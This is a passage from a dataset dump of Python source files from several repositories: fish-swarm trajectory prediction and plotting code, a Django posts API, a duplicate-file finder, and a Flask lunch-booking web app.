ind_ids\n\n def select(self, focal_id, predictions, simu):\n inds = simu.get_individuals()\n minf_vec = []\n # vels = []\n # accs = []\n preds = []\n # for i in range(len(inds)):\n # if inds[i].get_id() == focal_id:\n # continue\n # v = inds[i].get_velocity()\n # vels.append(np.sqrt(v[0] ** 2 + v[1] ** 2))\n\n # a = inds[i].get_acceleration()\n # if a is not None:\n # accs.append(np.sqrt(a[0] ** 2 + a[1] ** 2))\n\n for p in predictions:\n preds.append(np.sqrt(p[0, 2] ** 2 + p[0, 3] ** 2))\n\n # if len(accs) == len(vels):\n # minf_vec = accs\n # else:\n # minf_vec = vels\n # minf_vec = accs\n # minf_vec = vels\n minf_vec = preds\n\n sorted_idcs = sorted(\n range(len(minf_vec)),\n key=lambda index: minf_vec[index],\n reverse=True\n )\n new_pred = predictions[sorted_idcs[0]]\n\n for i in range(1, 
self._args.num_neighs_consider):\n ind = sorted_idcs[i]\n new_pred[0, 0] += predictions[ind][0, 0]\n new_pred[0, 1] += predictions[ind][0, 1]\n new_pred[0, 2] += ((predictions[ind][0, 2]\n * self._args.var_coef) ** 2)\n new_pred[0, 3] += ((predictions[ind][0, 3]\n * self._args.var_coef) ** 2)\n new_pred[0, 0] /= self._args.num_neighs_consider\n new_pred[0, 1] /= self._args.num_neighs_consider\n new_pred[0, 2] = np.sqrt(\n new_pred[0, 2]) / (self._args.num_neighs_consider)\n new_pred[0, 3] = np.sqrt(\n new_pred[0, 2]) / (self._args.num_neighs_consider)\n\n return new_pred\n\n\nmost_influential_individual = {\n 'closest': ClosestIndividual,\n 'shuffled': ShuffledIndividuals,\n 'highest_acc': HighestAcceleration\n}\n\n\ndef get_most_influential_individual():\n return list(most_influential_individual.keys())\n\n\nclass Multi_pfw_predict:\n def __init__(self, model, args, num_neighs=1):\n self._model = model\n self._num_neighs = num_neighs\n self._selection_method = most_influential_individual[args.most_influential_individual](\n args)\n self._args = args\n\n def _compute_dist_wall(self, p):\n rad = 1 - np.array(np.sqrt(p[0] ** 2 + p[1] ** 2)).T\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n return rad\n\n def _compute_inter_dist(self, p1, p2):\n return np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = [\n focal.get_position()[0],\n focal.get_position()[1],\n focal.get_velocity()[0],\n focal.get_velocity()[1]]\n if self._args.distance_inputs:\n X.append(self._compute_dist_wall(focal.get_position()))\n\n ind_idcs = self._selection_method.sort(\n focal_id, individuals, simu, simu)\n for idx in ind_idcs:\n ind = individuals[idx]\n X = X + [\n ind.get_position()[0],\n ind.get_position()[1],\n ind.get_velocity()[0],\n ind.get_velocity()[1]]\n if self._args.distance_inputs:\n X.append(self._compute_dist_wall(ind.get_position()))\n X.append(self._compute_inter_dist(\n focal.get_position(),\n ind.get_position()))\n X = np.array(X)\n\n prediction = np.array(self._model.predict(X.reshape(1, X.shape[0])))\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n\n prediction = self._selection_method.select(focal_id, predictions, simu)\n return _sample_valid_position(focal.get_position(), focal.get_velocity(), prediction, simu.get_timestep(), self._args)\n\n\nclass Multi_plstm_predict:\n def __init__(self, model, num_timesteps, args, num_neighs=1):\n self._model = model\n self._num_timesteps = num_timesteps\n self._num_neighs = num_neighs\n self._selection_method = most_influential_individual[args.most_influential_individual](\n args)\n self._args = args\n self._means = [None]\n self._stds = [None]\n\n def get_means(self):\n return self._means\n\n def get_stds(self):\n return self._stds\n\n def _compute_dist_wall(self, p):\n rad = 1 - np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2).T\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n return rad\n\n def _compute_inter_dist(self, p1, p2):\n return np.sqrt((p1[:, 0] - p2[:, 0]) ** 2 + (p1[:, 1] - p2[:, 1]) ** 2)\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n if self._means[0] is None:\n self._means = [None] * len(simu.get_individuals())\n self._stds = [None] * len(simu.get_individuals())\n\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = 
np.empty((self._num_timesteps, 0))\n\n p1 = focal.get_position_history()\n v1 = focal.get_velocity_history()\n X = np.hstack((X, p1[-self._num_timesteps:, :]))\n X = np.hstack((X, v1[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p1[-self._num_timesteps:, :])\n X = np.hstack((X, rad.reshape(-1, 1)))\n\n predictions = []\n\n ind_idcs = self._selection_method.sort(focal_id, individuals, simu)\n for idx in ind_idcs:\n ind = individuals[idx]\n p2 = ind.get_position_history()\n v2 = ind.get_velocity_history()\n Xhat = np.hstack((X, p2[-self._num_timesteps:, :]))\n Xhat = np.hstack((Xhat, v2[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p2[-self._num_timesteps:, :])\n Xhat = np.hstack((Xhat, rad.reshape(-1, 1)))\n\n dist = self._compute_inter_dist(\n p1[-self._num_timesteps:, :],\n p2[-self._num_timesteps:, :])\n Xhat = np.hstack((Xhat, dist.reshape(-1, 1)))\n\n prediction = np.array(self._model.predict(\n Xhat.reshape(1, self._num_timesteps, Xhat.shape[1])))\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n predictions.append(prediction)\n\n prediction = self._selection_method.select(focal_id, predictions, simu)\n self._means[focal_id] = np.array([\n focal.get_position()[0] + (focal.get_velocity()\n [0] + prediction[0, 0]) * simu.get_timestep(),\n focal.get_position()[1] + (focal.get_velocity()\n [1] + prediction[0, 1]) * simu.get_timestep()\n ])\n self._stds[focal_id] = prediction[0, 2:] * self._args.var_coef\n\n return _sample_valid_position(focal.get_position(), focal.get_velocity(), prediction, simu.get_timestep(), self._args)\n\n\nclass Multi_plstm_predict_traj:\n def __init__(self, model, num_timesteps, args, num_neighs=1):\n self._model = model\n self._num_timesteps = num_timesteps\n self._num_neighs = num_neighs\n self._selection_method = most_influential_individual[args.most_influential_individual](\n args)\n self._args = args\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = np.empty((self._num_timesteps, 0))\n\n p1 = focal.get_position_history()\n v1 = focal.get_velocity_history()\n X = np.hstack((X, p1[-self._num_timesteps:, :]))\n X = np.hstack((X, v1[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p1[-self._num_timesteps:, :])\n X = np.hstack((X, rad.reshape(-1, 1)))\n\n ind_idcs = self._selection_method.sort(focal_id, individuals, simu)\n for idx in ind_idcs:\n ind = individuals[idx]\n p2 = ind.get_position_history()\n v2 = ind.get_velocity_history()\n X = np.hstack((X, p2[-self._num_timesteps:, :]))\n X = np.hstack((X, v2[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p2[-self._num_timesteps:, :])\n X = np.hstack((X, rad.reshape(-1, 1)))\n\n dist = self._compute_inter_dist(\n p1[-self._num_timesteps:, :],\n p2[-self._num_timesteps:, :])\n X = np.hstack((X, dist.reshape(-1, 1)))\n\n prediction = np.array(self._model.predict(\n X.reshape(1, self._num_timesteps, X.shape[1])))\n\n valid_predictions = []\n for i in range(prediction.shape[2]):\n pri = prediction[0, 0, i, :].reshape(1, prediction.shape[3])\n pri[0, 2:] = list(map(logbound, pri[0, 2:]))\n pri[0, 2:] = list(map(np.exp, pri[0, 2:]))\n valid_predictions.append(_sample_valid_position(focal.get_position(),\n pri, simu.get_timestep()), self._args)\n\n return 
valid_predictions\n"
},
{
"alpha_fraction": 0.5541760921478271,
"alphanum_fraction": 0.5598194003105164,
"avg_line_length": 43.29999923706055,
"blob_id": "370bde5e76e854364e8a7889dc0196180eca7148",
"content_id": "20fb3ef7ec4eab06c4bf4e41d705a9f124d520a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2658,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 60,
"path": "/find/simulation/nn_individual.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom find.simulation.simu.simulation.individual import Individual\n\n\nclass NNIndividual(Individual):\n def __init__(self, query_func, initial_pos=(0, 0), initial_vel=(0, 0)):\n # explicitly setting that this is not a robotic/virtual individual\n super().__init__(is_robot=True)\n self._query_func = query_func\n\n if initial_pos.ndim > 1:\n self._position_history = np.array(initial_pos)\n self._velocity_history = np.array(initial_vel)\n self._position = self._position_history[-1, :]\n self._velocity = self._velocity_history[-1, :]\n else:\n self._position = np.array(initial_pos)\n self._velocity = np.array(initial_vel)\n self._position_history = np.empty((0, len(self._position)))\n self._velocity_history = np.empty((0, len(self._velocity)))\n self._position_history = np.vstack(\n (self._position_history, self._position.reshape(1, -1)))\n self._velocity_history = np.vstack(\n (self._velocity_history, self._velocity.reshape(1, -1)))\n self._next_position = None\n self._next_velocity = None\n self._next_acceleration = None\n\n def get_functor(self):\n return self._query_func\n\n def interact(self, simu):\n # this should always be expressed in the next position TODO: maybe generalize ?\n self._next_position = self._query_func(self._id, simu)\n if type(self._next_position) is not list:\n self._next_velocity = (self._next_position -\n self._position) / simu.get_timestep()\n if self._velocity is not None:\n self._next_acceleration = (\n self._next_velocity - self._velocity) / simu.get_timestep()\n else:\n self._next_velocity = None\n\n def move(self, simu):\n # TODO: reconsider this logic\n # if type(self._next_position) is list or np.ndarray:\n # npos = self._next_position\n # for i in range(len(self._next_position)-1):\n # self._next_position = npos[i]\n # self._velocity = (self._next_position -\n # self._position) / simu.get_timestep()\n # self._history_update(simu)\n # self._position = npos[-1]\n # self._velocity = (self._next_position -\n # self._position) / simu.get_timestep()\n # else:\n self._position = self._next_position\n self._velocity = self._next_velocity\n self._acceleration = self._next_acceleration\n"
},
{
"alpha_fraction": 0.49381932616233826,
"alphanum_fraction": 0.5011093616485596,
"avg_line_length": 33.293479919433594,
"blob_id": "a4389f3fe59fd4982b89edd842dfaf1f1020bd9c",
"content_id": "4c36c23b39a7302da212d336744050dfc932289f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3155,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 92,
"path": "/find/plots/spatial/interindividual_distance.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.plots.common import *\n\n\ndef interindividual_distance(data, ax, args, clipping_range=[0.0, 0.6]):\n lines = ['-']\n linecycler = cycle(lines)\n ccycler = uni_cycler()\n for i, k in enumerate(sorted(data.keys())):\n vectors = data[k]\n cvector = []\n for v in vectors:\n cvector += v.tolist()\n\n print('Interindividual', k)\n print('LF: ', np.mean(cvector),\n np.std(cvector))\n ax = sns.kdeplot(cvector, ax=ax,\n color=next(ccycler), linestyle=next(linecycler), linewidth=uni_linewidth, label=k, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.3, cut=0)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = []\n for v in pos:\n matrix = np.loadtxt(v) * args.radius\n distance = np.sqrt(\n (matrix[:, 0] - matrix[:, 2]) ** 2 + (matrix[:, 1] - matrix[:, 3]) ** 2)\n data[e].append(distance)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n interindividual_distance(data, ax, args)\n\n ax.set_xlabel('Distance (m)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'interindividual_distance.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Interindividual distance figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
}
] | 66 |
UshieChris/AAPI | https://github.com/UshieChris/AAPI | 52a089596c7f3e30a9a227dc4d874bf98bdcb702 | be991d2224306f99941bac54eca91b459640af49 | 9a6cba35dce67807b018478fc3401f39d9f78eb2 | refs/heads/main | 2023-06-29T10:06:39.807364 | 2021-08-03T13:43:20 | 2021-08-03T13:43:20 | 392,330,624 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7861841917037964,
"alphanum_fraction": 0.7861841917037964,
"avg_line_length": 32.814815521240234,
"blob_id": "b16f00f5d53b5554dcdf647247bc8d1d3b9016f2",
"content_id": "766ddf43852fd09cf01ac6b461c78cb5395508d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/posts/views.py",
"repo_name": "UshieChris/AAPI",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.contrib.auth import get_user_model\n\nfrom django.contrib.auth import get_user_model\n\n# Create your views here.\nfrom rest_framework import generics, permissions\nfrom .permissions import IsAuthorOrReadOnly\nfrom .models import Post\nfrom .serializers import PostSerializer, UserSerializer\nclass PostList(generics.ListCreateAPIView):\n \n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = (IsAuthorOrReadOnly,)\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\nclass UserList(generics. ListCreateAPIView): # new\n queryset = get_user_model().objects.all()\n serializer_class = UserSerializer\n\nclass UserDetail(generics. RetrieveUpdateDestroyAPIView): # new\n queryset = get_user_model().objects.all()\n serializer_class = UserSerializer"
}
] | 1 |
markgruen/file_deduper | https://github.com/markgruen/file_deduper | b2a511a603a023f650065b436fe54cfefdf905a0 | 63e04cf687e3e554424c92d00476178b90508ed0 | b66dc9fe7289751acb51771458f479d29362c64c | refs/heads/master | 2021-08-19T10:08:39.527442 | 2017-11-25T19:55:47 | 2017-11-25T19:55:47 | 112,021,586 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7629629373550415,
"alphanum_fraction": 0.7814815044403076,
"avg_line_length": 89,
"blob_id": "6e8c7a9e18d3829b5e22bba923173b6a4949476e",
"content_id": "66aa4f430d2f1a4a19b0d52057a83908bb048976",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 253,
"num_lines": 3,
"path": "/README.md",
"repo_name": "markgruen/file_deduper",
"src_encoding": "UTF-8",
"text": "# file_deduper\n\nscript will find duplicate files in 3 passes. First builds a list of files by size and second compares the first 10K of the files hash to see if they are the same and last compare all the files with the same first 10K hash to see if the files are equal.\n"
},
{
"alpha_fraction": 0.4000000059604645,
"alphanum_fraction": 0.6499999761581421,
"avg_line_length": 12.666666984558105,
"blob_id": "a9bb163a6a3efcc58143367ec27f762f07b19d44",
"content_id": "b550a3617dbcb7cc90db5c89d74b03594e675ecf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "markgruen/file_deduper",
"src_encoding": "UTF-8",
"text": "tqdm==4.11.2\ndocopt==0.6.2\nschema==0.4.0"
},
{
"alpha_fraction": 0.5458219051361084,
"alphanum_fraction": 0.556790292263031,
"avg_line_length": 33.47263717651367,
"blob_id": "ad69e391bbe7193a63e398650f74d23e64b8e23c",
"content_id": "b421375b3518c5cf51c448b3d3adbf554e307961",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6929,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 201,
"path": "/file_deduper1.py",
"repo_name": "markgruen/file_deduper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env /usr/bin/python2.7\n\"\"\"\nUsage:\n file_deduper [--skip=SKIP | --skip-path=SKIPPATH] PATH...\n\nArguments:\n PATH Space separated list of path to check for duplicates\n\nOptions:\n -h --help show this help message and exit\n --skip SKIP Comma separated list of paths to skip\n --skip-path SKIPPATH File containing 1 path per line to skip\n\n\"\"\"\nimport sys\nimport os\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom schema import Schema, And, Optional, Or, Use, SchemaError\nimport hashlib\n\n__version__ = 0.1\n\n\ndef escape_filename(filename):\n return filename.replace(' ', '\\ ')\\\n .replace('[', '\\[')\\\n .replace(']', '\\]')\\\n .replace('(', '\\(')\\\n .replace(')', '\\)')\\\n .replace('&', '\\&')\\\n .replace('?', '\\?')\\\n .replace(\"'\", \"\\'\")\n \n\ndef chunk_reader(fobj, chunk_size=1024*256):\n \"\"\"Generator that reads a file in chunks of bytes\"\"\"\n while True:\n chunk = fobj.read(chunk_size)\n if not chunk:\n return\n yield chunk\n\n\n# TODO may want to increase first chuck to 50 to reduce 7359 matches on 10\ndef get_hash(filename, first_chunk_only=False, hash=hashlib.sha1):\n hashobj = hash()\n with open(filename, 'rb') as file_object:\n if first_chunk_only:\n hashobj.update(file_object.read(1024*1024))\n else:\n for chunk in chunk_reader(file_object):\n hashobj.update(chunk)\n hashed = hashobj.digest()\n return hashed\n\n\ndef skip_dir(thepath, skip_paths):\n skip = False\n thepath_parts = thepath.split(os.sep)\n for sp in skip_paths:\n l = len(sp.split(os.sep))\n if sp == os.sep.join(thepath_parts[0:l]):\n skip = True\n break\n return skip\n\n\ndef get_skips(args):\n if args['--skip']:\n skip_paths = args['--skip']\n elif args['--skip-path']:\n skip_paths = args['--skip-path'].read().splitlines()\n args['--skip-path'].close()\n else:\n skip_paths = ''\n return skip_paths\n\n\ndef check_for_duplicates(args, hash=hashlib.sha1):\n hashes_by_size = {}\n hashes_on_1k = {}\n hashes_full = {}\n skip_paths = None\n timing = []\n timing.append({})\n timing.append({})\n timing.append({})\n paths = args['PATH']\n skip_paths = get_skips(args)\n\n print('#Starting first scan by file size')\n print('#Checking root path: {} for duplicates'.format(paths[0]))\n timing[0]['start'] = datetime.now()\n for path in paths:\n print('# checking path: {}'.format(path))\n for dirpath, dirnames, filenames in os.walk(path):\n if skip_dir(dirpath, skip_paths):\n print(\"# skipping {}\".format(dirpath))\n continue\n for filename in filenames:\n full_path = os.path.join(dirpath, filename)\n try:\n file_size = os.path.getsize(full_path)\n except (OSError,):\n # not accessible (permissions, etc) - pass on\n pass\n\n duplicate = hashes_by_size.get(file_size)\n\n if duplicate:\n hashes_by_size[file_size].append(full_path)\n else:\n hashes_by_size[file_size] = [] # create the list for this file size\n hashes_by_size[file_size].append(full_path)\n timing[0]['end'] = datetime.now()\n print('#Completed first scan by file size: {} count: {}'.format(timing[0]['end']-timing[0]['start'], len(hashes_by_size)))\n\n # For all files with the same file size, get their hash on the 1st 1024 bytes\n print('#Starting second scan by small chunk size')\n timing[1]['start'] = datetime.now()\n for __, files in tqdm(hashes_by_size.items()):\n if len(files) < 2:\n continue # this file size is unique, no need to spend cpy cycles on it\n\n for filename in files:\n try:\n small_hash = get_hash(filename, first_chunk_only=True)\n except OSError, e:\n print(e)\n 
continue\n\n duplicate = hashes_on_1k.get(small_hash)\n if duplicate:\n hashes_on_1k[small_hash].append(filename)\n else:\n hashes_on_1k[small_hash] = [] # create the list for this 1k hash\n hashes_on_1k[small_hash].append(filename)\n timing[1]['end'] = datetime.now()\n print('#Completed second scan by small chunk size: {} count: {}'.format(timing[1]['end']-timing[1]['start'], len(hashes_on_1k)))\n\n # For all files with the hash on the 1st 1024 bytes, get their hash on the full file - collisions will be duplicates\n print('#Starting third scan by complete file')\n timing[2]['start'] = datetime.now()\n for __, files in tqdm(hashes_on_1k.items()):\n if len(files) < 2:\n continue # this hash of fist 1k file bytes is unique, no need to spend cpy cycles on it\n\n skip_files = ['txt','nfo']\n for filename in files:\n try:\n if filename.split('.')[-1].lower() in skip_files and duplicate.split('.')[-1].lower() in skip_files:\n continue\n except AttributeError, e:\n continue\n\n try:\n full_hash = get_hash(filename, first_chunk_only=False)\n except OSError, e:\n print(e)\n continue\n\n duplicate = hashes_full.get(full_hash)\n if duplicate:\n hashes_full[full_hash].append(filename)\n else:\n hashes_full[full_hash] = [] # create the list for dup files\n hashes_full[full_hash].append(filename)\n timing[2]['end'] = datetime.now()\n print('#Completed third scan by complete file: {} count {}'.format(timing[2]['end']-timing[2]['start'], len(hashes_full)))\n\n print('# List of duplicates')\n for __, files in hashes_full.items():\n if len(files) < 2:\n continue\n print('\\n'.join([escape_filename(f) for f in files]))\n print('')\n print('')\n print('Timing summary')\n print(' Scan building dict by file size: {} count {}'.format(timing[0]['end']-timing[0]['start'], len(hashes_by_size)))\n print(' Scan building dict by 1k hash: {} count {}'.format(timing[1]['end']-timing[1]['start'], len(hashes_on_1k)))\n print(' Scan building dict by all hash: {} count {}'.format(timing[2]['end']-timing[2]['start'], len(hashes_full)))\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version=__version__)\n print(args)\n print('')\n\n schema = Schema({\n 'PATH': And([os.path.isdir], error='Must be valid paths'),\n '--skip-path': Use(open),\n object: object\n })\n try:\n args = schema.validate(args)\n except SchemaError as e:\n sys.exit(e)\n\n check_for_duplicates(args)\n"
}
] | 3 |
hhagmans/mittach | https://github.com/hhagmans/mittach | b8b7bea3095a3cf342c291112cb51985bd9da2b6 | e8309b5f435bb2679b233bd1bfa7d6060d998e75 | f77538829afe23a73d5730986e63bfad0f39a2d3 | refs/heads/master | 2021-01-17T22:02:36.547614 | 2014-01-31T15:52:47 | 2014-01-31T15:52:47 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6198971271514893,
"alphanum_fraction": 0.6278331279754639,
"avg_line_length": 36.14858627319336,
"blob_id": "19a127cc2c0362f9f1763b27be3de46073bb9545",
"content_id": "efe3fb3087042788387e09a59d0572f6d7052113",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15768,
"license_type": "no_license",
"max_line_length": 424,
"num_lines": 424,
"path": "/mittach/web.py",
"repo_name": "hhagmans/mittach",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n\nfrom __future__ import absolute_import, division, with_statement\n\nimport os\n\nfrom datetime import date, datetime, timedelta\nfrom collections import defaultdict\nimport json\nfrom math import ceil\n\nfrom flask import Flask, g, request, url_for, make_response, redirect, abort, \\\n render_template, flash, render_template_string\n\nfrom .config import read_config\nfrom . import database\n\nfrom flask import current_app\n\nNAME = \"mittach\" # XXX: unnecessary?\nADMINS = [u\"co\", u\"hendrikh\", u\"anjaa\", u\"uschin\", u\"mkl\", u\"hendrik11\"]\nMAXEVENTS = 10 # Max events on one page\n\n\n\ndef debug():\n assert current_app.debug == False, u\"Don't panic! You're here by request of debug()\"\n\n\n\nclass RemoteUserMiddleware(object):\n \"\"\"\n WSGI middleware to inject a REMOTE_USER for debugging purposes\n \"\"\"\n\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n from getpass import getuser\n environ[\"REMOTE_USER\"] = getuser()\n return self.app(environ, start_response)\n\n\n# initialize application -- TODO: move into function in order to pass parameters like config location\napp = Flask(__package__, instance_relative_config=True)\nconfig = {\n \"mode\": os.environ.get(\"MITTACH_CONFIG_MODE\"), # XXX: hack for testing; this should not be necessary\n \"secret\": None\n}\nif not config[\"mode\"]:\n try:\n config = read_config(app.open_instance_resource(\"config.ini\"))\n except IOError: # XXX: temporary workaround until `__init__.py` is nothing but metadata\n import sys\n print >> sys.stderr, \"[WARNING] bootstrapping configuration\"\n config[\"mode\"] = \"development\"\napp.config.from_object(\"%s.config.%sConfig\" % (__package__, config[\"mode\"].capitalize()))\napp.config[\"MODE\"] = config[\"mode\"]\napp.config[\"SECRET_KEY\"] = config[\"secret\"]\nif app.debug:\n app.wsgi_app = RemoteUserMiddleware(app.wsgi_app)\n\n\[email protected]_request\ndef before_request():\n g.current_user = request.environ.get(\"REMOTE_USER\")\n if not g.current_user:\n abort(403)\n g.db = database.connect(app.config)\n\n last_month_end = date.today().replace(day=1) - timedelta(days=1)\n last_month_start = last_month_end.replace(day=1)\n g.last_month = {\n \"start\": str(last_month_start),\n \"end\": str(last_month_end),\n }\n g.last_month[\"name\"] = month_name(g.last_month[\"start\"], True)\n\n\[email protected]_request\ndef teardown_request(exc):\n pass # no need to explicitly close the database connection\n\n\[email protected](\"/\")\ndef root():\n return redirect(url_for(\"list_events\", page=1))\n\[email protected](\"/events\")\ndef root_events():\n return redirect(url_for(\"list_events\", page=1))\n\[email protected](\"/admin/<page>\")\ndef admin(page):\n if g.current_user in ADMINS:\n pages, sortedEvents = get_events_paginated(page,g.db)\n return render_template(\"admin.html\", events=sortedEvents, new_event={}, cpages=pages, current_page=int(page))\n else:\n return render_template_string(u'{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} <p>Du besitzt nicht die benötigten Rechte für diese Seite. 
<a href=\"{{ url_for(\"list_events\", page=1) }}\">Zurück zur Übersicht</a></p> {% endblock %}')\n\[email protected](\"/events/<page>\")\ndef list_events(page):\n pages, sortedEvents = get_events_paginated(page,g.db)\n return render_template(\"index.html\", events=sortedEvents, new_event={}, cpages=pages, current_page=int(page))\n\[email protected](\"/bookings/<event_id>\")\ndef list_bookings(event_id):\n a_bookings = database.get_bookings(g.db, event_id)\n if len(a_bookings) == 0:\n a_bookings = None\n return render_template_string(u'{% extends \"layout.html\" %} {% block admin %}<br><a href=\"{{ url_for(\"admin\", page=1) }}\">Admin</a>{% endblock %}{% block body %} <p>Angemeldete User: <br> {% if bookings != None %} {{ bookings|join(\", \") }}{% else %} Niemand hat sicher bisher angemeldet.{% endif %} <br><br> <a href=\"{{ url_for(\"list_events\", page=1) }}\">Zurück zur Übersicht</a></p>{% endblock %}', bookings=a_bookings)\n\[email protected](\"/admin/bookings/<event_id>\")\ndef admin_list_bookings(event_id):\n a_bookings = database.get_bookings(g.db, event_id)\n if len(a_bookings) == 0:\n a_bookings = None\n return render_template_string(u'{% extends \"layout.html\" %} {% block body %} <p>Angemeldete User: <br> {% if bookings != None %} {{ bookings|join(\", \") }}{% else %} Niemand hat sicher bisher angemeldet.{% endif %} <br><br> <a href=\"{{ url_for(\"admin\", page=1) }}\">Zurück zur Übersicht</a></p>{% endblock %}', bookings=a_bookings)\n\[email protected](\"/events\", methods=[\"POST\"])\ndef create_event():\n event = get_Event_from_Request(request)\n errors = validate(event)\n if (len(errors) == 0):\n database.create_event(g.db, event)\n flash(u\"Termin erstellt.\", \"success\")\n return redirect(url_for(\"admin\", page=1))\n else:\n for field, msg in errors.items():\n flash(msg, \"error\")\n if event[\"slots\"] == -1:\n event[\"slots\"] = \"unendlich\"\n return render_template_string('{% extends \"layout.html\" %} {% block body %} {% include \"create_event.html\" %} {% endblock %}', new_event=event)\n\[email protected](\"/reports/\")\ndef report_bookings_var():\n return render_template_string('{% extends \"layout.html\" %} {% block body %} {% include \"report_booking.html\" %} {% endblock %}')\n\[email protected](\"/reports/send\", methods=[\"POST\"])\ndef report_bookings_send():\n return redirect(url_for(\"report_bookings\", start=request.form[\"start\"], end=request.form[\"end\"]))\n\[email protected](\"/reports/<start>/<end>\")\ndef report_bookings(start, end):\n \"\"\"\n displays a simple report of events plus bookings in the given time frame\n\n both start and end date are ISO-8601 date strings\n \"\"\"\n\n events_by_user = defaultdict(lambda: [])\n for event in database.list_events(g.db, start, end):\n for username in event[\"bookings\"]: # TODO: limit by AuthZ / user\n date = format_date(event[\"date\"], True)\n events_by_user[username].append(date)\n\n rows = [\"Mitarbeiter;Anzahl;Details\"]\n rows += [\";\".join([username, unicode(len(dates)), \", \".join(dates)])\n for username, dates in events_by_user.items()]\n\n response = make_response(\"\\n\".join(rows))\n response.headers[\"Content-Type\"] = \"text/plain\"\n response.headers[\"Content-Disposition\"] = \"attachment;filename=%s_%s.csv\" % (\n start, end)\n return response\n\[email protected](\"/reports/json/\")\ndef new_bookings_json_next_week():\n return json.dumps(database.list_events(g.db, (get_next_Monday() - timedelta(days=1)).isoformat(), (get_next_Monday() + timedelta(days=7)).isoformat()))\n\[email 
